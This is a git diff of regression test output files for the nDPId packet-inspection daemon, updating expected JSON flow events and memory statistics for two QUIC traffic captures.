--- a/test/results/quic-27.pcap.out +++ b/test/results/quic-27.pcap.out 
@@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388075915} 00622{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388075915,"flow_last_seen":1592388075915,"flow_idle_time":200000,"flow_min_l4_payload_len":1330,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":1330,"midstream":0,"thread_ts_msec":1592388075915,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388075915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1392,"pkt_l4_len":1338,"thread_ts_msec":1592388075915,"pkt":"AAAAAAAAAAgA1Oceht1gB9AaBToRPz70IZT0pjUDQM0HFABXxOQvPWTRnVlUmwAAAAAAACAO+uUBuwU6BFLF\/wAAGwh7p3UKjzv1VgAARSBBNb8rxExjuvv1Ye++hbc9om0DU4NnwSG\/3UebQzKe+\/ChMR6f65IjHiAPoLAAXROmLqaJFJBg9Sjii5GNpIY1s7jLmFqalAiGP2eQLOW5rgxDWycwtAoSDO71eI9T1Uq7EBmGHvnPmeSBFCTAwbphrP9uMLPyAc17USwCikZDlt2XGVMfiXze2ila5iBclIpM\/nqIjbZDUUYzdC34yYbr54VrUe33DQppusK5QzTfqS+3bRJeNmvfVjhputwGoNup+0y7rJDCwpxgcjG0dCKgMjLHOmSc3TOXpHySWsU8YrZhzLttd3CTZRM5WZ+WibgEID8\/Y94\/jmGwbweD3Pfo3Ppwfbm6t+wCItY8yBKRQ+H5v5jedjzP\/LjrRtljajhGcJZd6HJgjueiAiaEAdj7fx0T9yjCxPVImLtLHfXPo558xAwXVU83pzT9xavzftzVp99vYm\/GU\/kg1VYfnH4H1qpMlTlic\/Q6Q8iLnCNGJ9LIhtmYFfunAmiyObADRsU4B6j4HoJX3if+mucsKdp+8N3ugLjM4uwUvOF7XyACDpCZ\/G3\/5X5J\/zKZkqDPUYvuluMsSOj8B9WlMWtbGerp5EjqolIlNnjYomDTKeHIxZZRBaJp\/QOHxqWVWl+MlH9KWaLg+UuJ1tkD\/z7oSb+H1aPInCB0q4IOfY52jC5M0sAyNUCCRYRJtlGM\/qM0P8wM\/vcpX4GIrlML77jxP6dU5SrTUTaXASv8j9337neVie5dGU901jPeI0ibTEPO5jmp5JTAiUrtWT\/OPLGl6+AqDrvj2iLYI6MfHf54Ll0eSJwKxczdOyajjbkW+wF4mDNBcrHs+Iy+NLs84KPkQaEHysgP5fydEh4OpzytKTjbeDrjBTG9KcUWYmBar2q8HpPFclPVfMJzlgzmG1ymiPOmBJDgqQ3ZUM2g855ht6g7tzCMio0LrDHG0qDTQGyGwGnOACHMF4aRlNBHHPXjD0AWFg5ITC\/muG1btVnHCRMRKjcJbcwgB5knd4j3yLyF5jIDRSKNhE6Ac48oXpl\/X8QX7id\/RdTdMTE+I9ImLp3efowsLaCMtmIEe+7JeD8HXS\/DHY7CcQC7QJJxTExlt1pZ1J8VxZQ\/Rin8crO7sCUZAX\/MAmOTczrCmlYKxmfZCym\/VBLaEls1IO\/vlhGhIazJ4ec+unaATLsbpA8gpl3A6fA\/mtphj6B2kmQmdb4PDBkjLGlUB9TA\/hWCdu8okA42ElpefKLs7iaYvj9eGjbpH4CtZIsn81hYHam0KixsLnFD01WT2G3jWF4\/p32XASEAIX2fGqhIl42kT79V0gWU\/zHFYX4d1dqE0R0QvDLgaBR5adJ\/AQSCQX30uHxQBsrPiDAUle40F0f\/CKLbXDtfvQg3i0EyI3KXCW22kEkJyctCWU066Vqsp6MiM5DPCQw20QD2L38WJTrzFxYD7gmCe1AwoQFfD6gqTnrS3Tj0ht5GTD8v
sEYZ0oezjMP8XuBMCjClE8hToMxgRyaUKQoJ4zuAen+tMutEa2m48+u5jHJEJljGjHC4LHZWMR3906vXde+zdCg1ShHY11L\/Bz5vKrplIBCiT9vl3ZYNjO6hBlbKS8VP\/yg6gsLQ9AigFTHxstN+VusbiYbo8JJgQWEcDGy2dI9GZZqPmAAFQeJAEQIBnrb965lc\/aHxPwoSZtBKWldoAMiE22ownQezP3boCQ596Xlhlq\/aTLkj8uddR096XdeUuOzAUI7eEPdA9iCr"} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388075915,"flow_last_seen":1592388075915,"flow_idle_time":200000,"flow_min_l4_payload_len":1330,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":1330,"midstream":0,"thread_ts_msec":1592388075915,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"beta Chrome\/84.0.4147.45 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388075915,"flow_last_seen":1592388075915,"flow_idle_time":200000,"flow_min_l4_payload_len":1330,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":1330,"midstream":0,"thread_ts_msec":1592388075915,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"beta Chrome\/84.0.4147.45 
Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} 02271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388075921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1392,"pkt_l4_len":1338,"thread_ts_msec":1592388075921,"pkt":"AAAAAAAAAAIA6W2Tht1gAAAABToROC89ZNGdWVSbAAAAAAAAIA4+9CGU9KY1A0DNBxQAV8TkAbv65QU6\/nTM\/wAAGwAIe6d1Co879VYARSBTj79W6cwNvYIa4eRJRqYVEF\/FFQs4\/YFJNsPxXKvEgdRDTO3utbDdVpsr9xE5Fa\/TpG177HOYaSrCAz5Jo2+BV5oFjmMd9bTEkWInl1UOdHKW2niDF5nMaLe02aYd0mp25Hmgx4h+P4ZNUU2g7lMQwO8oh5pyFwebO4ynZaVfKfuvlderCYi9W3A+nCI5swIBOg\/\/GR\/eRpRy+l1xUDMEIkXKJ9xm\/36tgV9mPj+QnGLik9ENPu+ZN+Me0EJ5sHt5U9N9HC21bIxbx2522Px9RzM8EV5k0bNaVeSUX6Kx86PSOGKlOzKToSyBuVcP\/8Y\/pj31FFMn4jXKSKIZkR4jdHKqC8A0U8JWz+lo5qygK0a0s0j3vnz5UfxKqxBqYcCTRyIv0ihPq9lNS2XBnJHxjyGSIIPIjQ8xsASU2vSfjgEk5w8+ci+un+2IlNQ9pkFNXyipoW9wTbokYSnOTxLk6sFfH3dsyfqGWWE1tcdt7fy7oyiEsvZGRhn\/L+h2S5jSKsdHx7NdNgIdO39fvhXOA8HjSqb3VALAtyj6ehundx3BZcRNfsuUa5ZwC219uau0CpTuX2Tcg4sLjnvZG2Lvryln9pXYVKexJ7M82YgjmrH3wKorHuQt5fR9o7MWyn4djeqsrjK1KyRTCzgfjFDh3HyEU84LAmn6y\/vAo6GV5tlhx7mhZNMKhoPxPwLQjI9LlPc\/eMbJSDiPSdtQN0Aka6OS5JgFtfkS4GGEZrqH3Wmy218ogEMrR323mHZfknuU+di+qZFkdH\/EQiWObuHXwvxT+d8mUKnyAB02BTcx6ikllxkk+7Anulz\/alZEZCKgpjN62uDEL1zgUQWaEwOMai6Bq8aLpyIjWmfI3mXlEoQL9YGtvFU3NA0ZJr0FsSmnF79XixoAiidGmVLveJwbz2v70EltiOw6GW4XT1Nx8GJbOHEb4lw8Nf+y1YmbiOSl6N6MqAV+LTudvCC93HluIlhU0E3uX9LGDS+ScDF\/SXTW4zk9DPu\/I2vtwGCJX81Rv1WV8uy3YU63ClpeYXvX7h3rAbpodg\/tjIJpSxX8PbWv2L+X7I9n9ASbVRLPybgw1VXro90q6rMYVQ\/J4rPmhLpWzdEAazqGLHFi9KCGNiyg\/RvVoTwUKLYJ2wN2A7fA5TkKjD7w9oSn095bN7P+h75McGVrIyVqdEh4yuOB+Tvz9c62lXezMJJBw0zLwBGL\/8fc+U1+0HGaZ8c8r\/a9gzaAu\/1hL\/GX6BDxGvNlvCbNJSR7uYc+tLK+p8LJwdEE6O1NRlrVaqPbBG+gZN39wLrBIi\/4C1PvaV8uwXWpwJT4\/2iKYJmYuzWYHqO
Yb26qPVfaWtKa8zR+ytS6h93OrCLmPemuHc\/JEUEpO0dp8igHMSUL1C+oRr6S3mhQFj3DoLOC25YV2Nz23shcZvt4jUGqP33atbdN9fs6Z6FU668dqDsydPhc\/SLsWEHLNI2dYaUpYVsKq4rnVyNmOwE\/6yXFioayjL1rahnUdwSUA+95p6JoySDTBjZ0UNSLSl7C2+U5OFwI7ckGRhoW0KKahovJhm17+fTYxdp+9HuvzWSSUY0fZvLQBV7yxLsR4PcQVPaqkZsrRSNzLBu5zsWgsJ7iTP5Pui\/izmglDfXm4vEH6laDbuG6URrQ7dv3yhcwEz\/QEq4E36vx+7mzPgws4U6N6vHcQkT\/3gkAaI1tEvZMgcRaUphUC3VFG3nl7XwQxFcW31F+TgbWi2aESvVU"} 02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388075957,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1392,"pkt_l4_len":1338,"thread_ts_msec":1592388075957,"pkt":"AAAAAAAAAAgA1Oceht1gB9AaBToRPz70IZT0pjUDQM0HFABXxOQvPWTRnVlUmwAAAAAAACAO+uUBuwU6q+fA\/wAAGwh7p3UKjzv1VgAARSD7U2hL0O88k3UZXjUbrBBd+WZB0UG\/j7758xlBZzizfYUS+JxzLcKYGo8WQzFU7GyiuzvE8f9eov2KYsEVwanC7Vc9pLDljUq9fi2hrf+FzyyRcUlliaDQXxX7n1Ivm9KRXOqnnKdmfHVEvBFAffLmUIXWbO+YgkFjGfD8GnPXDCrAqvwlSSmWge5izab1xOS9Wo1XnWifp0lpGLQpE1MqqxNhBIDxbfaVbjuMEAWyrxRLEqh16GZ0\/jsodxxqlZew4w347xtEtqPzlLyHr4poFBV0Y0YYyCJ1yuoIhaXm+33Z+1T2cYWE7O6I9WEk+mBcGSHxZEZP4CaDr0T3d2jgKsNoKY7bkKT1W4j+vuMJDFuHBaV9SRkGAElCQfGPawy8Ys82dsHnmEEyzp8V6ce7FzsZZVA9JPutVgoejftdzH\/RLPkp8RBEvUi+HMOKcmfLfnWgmtZUoG2P5WRsd4keUAJzFzPu8JDFkn8Qz7I2ryzN2cOlRhia\/jz4PgIUt+4ZQKXncNfyTzS2OteWVaV9zMESXfyvD0pVAT08qEHRc6laTl0ufuUQBtHn5CKjoJYFHspiVeCiJegPMoj4HilpDrhpSZdELNW8O6lX\/+Ya\/E5+xP\/XiQg9mVqUhmMopCMRpiLIe2Y5jGt3vKxJGa5gox\/Ao+2MtfZQZSIoFcP8KluOAfCrb5sGinc+sTc+ZKeAOQmz2FRpTh4fxO1mAo2o9ZJLguqcLrOlyxUUSOHnuLgNLS7XObH1LUUip1vPpeYTmlqzrANNh9EYL2PlIErptyjoZYKQJ8rGcKFCKO11+88Wp\/LRi79APRPkY6RnAKucyRnsrN5ZraDdPgKee842vxIdbP4CvpQKByezNr0Y4u9e5janU208elx\/zNNPzGR9+gsEJIstRXxFey8H0re4AXkIgXjqAReUAEftPwSWT1yW9+jva9RQbrdrR5MlklIvCCr\/7U5+3OUw9\/43s\/O3pgzG2DXT5bg3D27JwIW8euuy95GFovl\/nwOfDJmNLw18bQ3hbUqIFcvmzSmF4CVgS8f8nD5zXQn0Y6t6H\/0dRw6m\/fNV\
/hHkJp2gXqQ7165w9HG2aJNS+9mCFSeYNr4H2pXUCnIsj\/Pby8rM4BOGLZX6zg3e6S5gFfYBAXTKRGfLDh+HC8x9D89XnWP0cyQWheKUU2YWacOr4WVE0zJK4qj2v39Y03nQgSY7Oa54R2PRMjuzzTSkaITdQ1fo\/eapkrPXa1eGFgwwF6EMe47fkokLHjscKhQ9hUwVD1WZo132hEoWEgCk6GBm9kpFczYiEdZUPhpULGvCKI1iCSBgMjY4vkSPjkj\/CUDk9lkmQxFPWmRRIn5bNqB\/16pGMD5AZgW1l2kOJo5CYfNF1x84eGg+l3fSTIrHWDb7BvF8kmCbEpzK5xtWGHGjxOpk\/7a+pTOyHHSCngxZDzPdni8BcsxtcevFPBg2cOlxb2H\/0wK6HxkRNoGyDH5CwTV\/9XVHoipCcVdCRMqh2JweXzA8wyDxryIMQur2tx3A0CW64wtn\/h7BSyKnDTRXR1V+Wa7DymTTmnRiQ6l5f3ecwcceih\/JZP\/GSUvQLB1MZBKOprH4Whg11Rc2g4AjShZ7+YxYeeQtOgNFCRS53FA6JbVYqDpNySia3zORBhbds4Rqs3FtKCEuzx1fAYtgyzWdf8adqeSwRKSlOPPdqsVh5zsBNqK4beqT9\/RPVDkfR2bjUTRJesgqyVO6iWDbnnnAdtd3"} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388075915,"flow_last_seen":1592388084373,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1592388084373,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388075915,"flow_last_seen":1592388084373,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1592388084373,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic-27.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":11647,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1592388084373} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880367 bytes -~~ total memory freed........: 5880367 bytes -~~ total allocations/frees...: 118156/118156 +~~ total memory allocated....: 6014001 bytes +~~ total memory freed........: 6014001 bytes +~~ total allocations/frees...: 120918/120918 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2279 chars 
diff --git a/test/results/quic-28.pcap.out b/test/results/quic-28.pcap.out index 3e6af498c..9cbe158ee 100644 --- a/test/results/quic-28.pcap.out +++ b/test/results/quic-28.pcap.out 
@@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591267474847} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591267474847,"flow_last_seen":1591267474847,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1591267474847,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02063{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591267474847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1591267474847,"pkt":"7jdRvai\/bmImQfCgCABFAATMbsBAAEARSUwKCQACaBoL8OrKAbsEuILewf8AABwQgoOBp4aIL+MPCXOdR4KiFxRAxLpnL0UX1efsgg\/VSxB4df2ozABEgmEZ7SPB63FDIt1\/BNmaABrW7\/a2mJ6Qg87qxio5qp+Au1rZycjjs1xq27TUqOstzWUVkmwpCYXpvpOqlbwTvnFsXueqMWKDAlTPVsrztIv2pHHHaD8h888fq\/JGG\/YMsyu4siFFo62sUPCzYnviiGb9Ejlp4qwUTq4AjO99Rthdv2GbNC\/OStXSWSDjD\/leZL9UJEZcJ3LhlgqAVgxUVrxuE0rbeF3i8aF9iakAqxlqpoDj1+5t7ILe8xHKg8FUG1XnL5zpn1\/qeTvTEm18Ejt5DZJvb7rSMM3y0kFKOsdK3+oTGrisBL0Fe\/eBZ9f4xHzZvM5y3BCl2N6qMFMX+sMnr8ggfIKSQlAxo6qy68ZM170NeiI1bIaY98nIrG3zZt3dnHbbcgfFiN6lFzYaQLJBtV\/WEYTHy0okUamYC\/5cNM9tSXVBXfneC5HIpPjBuuyE4+LzF5EWg6rp8zulZ5VOTIetNIdJsnU+GlxyeY+BVtCQCCyWElUlL9X91YgIZ8MpCHxRq8ZJCkmY4nF34gFHgfsegffKnBAav99zdzm50AvMu4lP1B1F6cRA2HMPmAvCgUL1IKMcacz2eCZBB7FWHguZbpDdL2+wruFSVOAWeB+lE\/kuyF3MF8D5tAMKtEitOKdhqy3C3qGvZcZVGOZKPWGr2BC7JbZdFGIyYmNwp\/bvvX8XvDggJHwe6xhqAz5sua3BsvUJ1vySN4kKaHQ3EYKLbPPRjDwQinHrO49sFr8oWJyt7OK1yq06uwrlP3p4sqV3\/tL4FsOHtHVAI5LvRB8KISYciiug2cmuSgzkDgaTo\/e3D\/u+rCXDQ3xoip3ktBsckfTnGfFRGZIYxKdaQnHhOXiTzFQ6mSTNof1wHefWEQube1a92cmaAPSGQOt3LWbH6N8\/qM1mTakjE+QJv0K3HWVx+nbk2qFqJc+rHv1Ie37Z2+wHGh0NjwgX3P+8AdCqq6tgRzOpAdLNRrnirmseM\/zZQ0+cDRuw83pFP+UWZ+PCK3wKRZu1IhQ2h6D6lcGAbZA9ehc5yOvz0v1LsR84aEk1FsEGNTqF56I+GB\/2xRH4N5F5aeUjnenJzGpEQkofmIzcU+knq+dcQuuDHuOTLNDIaiPO+4HYzT5IY6vCSgCHcPgQVRcUuuSg\/GpGaVSknd81XIsamcRfeqURHQ1MVwmLxgOMP3+I5HFeghmJ+ki2zeRb+13f3SNlS\/RoVNOTrzjA86oM8wlv5t\/i38dgJDMR2ZvO+tz4iV7y7Y3T7RFYvvK2F7LLOH5ZrOKSeJb1SNqfpAw6nEHN8am8q6WcZIClcZqDQiuuDV2HpT1RM8QezzenJxkksNL2P07lZwI9HU4P7Ayp4wWZ6zeiRYoRywRS5R5VWfF7StuaGYuXatUeylxdjHJ8UwmFRvFoXP+8SlDa8jkz\/qhABAK7x0AzjsV\/3jzRSi1nVL9yl92ydFm7OXWFMLaMdafTsMx6
SG3eTR9qPpGQqQKfrm9F1wk7utXsAM9DKqSLm\/MYVhMIgqodecjchaLAXg4QPX1N"} -00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591267474847,"flow_last_seen":1591267474847,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1591267474847,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.wireshark.org","version":"TLSv1.3","alpn":"h3-28,h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} +00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591267474847,"flow_last_seen":1591267474847,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1591267474847,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Cloudflare","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.wireshark.org","version":"TLSv1.3","alpn":"h3-28,h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591267474861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1591267474861,"pkt":"bmImQfCg7jdRvai\/CABFAABL8YhAADkR0gRoGgvwCgkAAgG76soANzParQAAAAAUQMS6Zy9FF9Xn7IIP1UsQeHX9qMwQgoOBp4aIL+MPCXOdR4KiF\/8AABs="} 02063{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591267474861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1591267474861,"pkt":"7jdRvai\/bmImQfCgCABFAATMbsJAAEARSUoKCQACaBoL8OrKAbsEuILewv8AABsQgoOBp4aIL+MPCXOdR4KiFxRAxLpnL0UX1efsgg\/VSxB4df2ozABEgps603pxkyOuWqOuDCBHqFD5j6Z3HbedH1LdiS7r9g7eF1q+4GbQDzwEnV9STArM0Em4niSxcOP14YGEMbCxBeurtCEC8Tmf6DBDqyOKEQqlh98RR0FuyctJCM99u6oRT6urYJjdL6PSSu3YTL8HY6NviKj+LkpdTz6KmCgYvbgKd7NEhPEXmVYO+dL7mTC6YtcnEsrAHQU704mlKvqtFGL2\/5msnq\/TWBIk6bybV0DxYkGzE2Dnlwtw+dvrt9SpZJQBYmvuqQWRkw7Xl0Ri5Ou\/YH0Nf3CEwfW93dKkzcyI\/xYg9i+2QKy1ICjIZ\/JAWTdEHFRK8O6Gl0vStYOHFWBxnM\/YifVgYZg0OsrKE2RfzjKKmCKUpNz\/eEInpy3g7Oy6BASDjgCLyqH4KHC0RkRyxMeAwO\/4Ueuev5PR+GIZT6RPX+8eDG+GEJz8bGHJ80oLKupj5MfUtk1+qegg2dzVfHgOvprBxIArXCNmBUVNivV7wlObqf87COabZiPrwNrq3bed\/ALhpVnLbXDu3mPYFozof6hWLQUSRUCvRIP+L3zyyxfAOLZZ711TySAZxpgSSNbMb5wMga2ZxBCZGIiJBujBs0RFh65ea1D90334s1gOATeyFD6G0Y5nni0vv93RqV0rCUx5NmKsmees6Lb5Tn92zzlLElQ0tJj8i0NV+A1o9UmRJisTfKPDHGhnjIKCy7tWmA\/6WnyjC5MVpEofvbOp6VSLzrYFEbs4xO0nP5EWcI9akrhkBkR4BVPvA3BR\/JNC6qdA6XjZq7vEC4PK42e5TCzz\/lS4AoqV6qY+iOUqeRm\/KZeFGwLXw2YBxOFGvLQSYLCrM0JT+ZZ\/+YM0cgNTb4UsfslWeAa\/dEDn2K0d5vlVIufoqB2DscZriUDfkBrMe3p2BYO28jOG0dIt\/\/+wVszbGGjaG2DAkiTDrcM67+fz7k2j14PiNbU6+l0I0CfyoRbB67XXdFnP
llMtNEGiR4aBRcQCCchbCVwdD7xGfKg8VLCKykEzUES\/y7hiagE2xpKTSbAUtzMYTnIbSLikbFGyfUOpyFdt16r3gk3qkldqup8CI9vmdvD1rvxsFHFdQKlm4ct28WVqNsM7AcMCYS4IdY3fjlHdgQeFzGauOLiE2HquU8FAgRipNJCs2vXSgmlj6qxAuSretb3YYCFUtS5vV7VhzZ\/si5aRaf72K7CkGDHBs9yzIrPzdtDp1CIjAcpqkTgTiqw5a7bneWQdm6knt9coPgKABTdfR1Wfei0Q3edydbubwRd1QyG5zjI0T9bXVZf85BmVvZ\/oiH86E0oC1c6Hyl3M4ke1W9+ncVNagK7XEVU\/lQ9u6NvkLWq7c7LzCfIQKMjglkD6IZxuZzbgX+IVXu+2\/W0iJnR1BIZqRhI1sURkCMk5kSbefJtA\/3ss1rR1eV5WU9Nj63Lk8fki45wlDZBMYeXWKNBze+M4K2DVnLaUMILrXDsu6YTHRFaaXufk6rRMF0IUC\/p6LhqvtpFhBb7T6xRXz1tVkXrpMYBZz4xjGSbfGjFB"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":253,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":253,"flow_first_seen":1591267474847,"flow_last_seen":1591267477602,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":236167,"flow_avg_l4_payload_len":933,"midstream":0,"thread_ts_msec":1591267477602,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 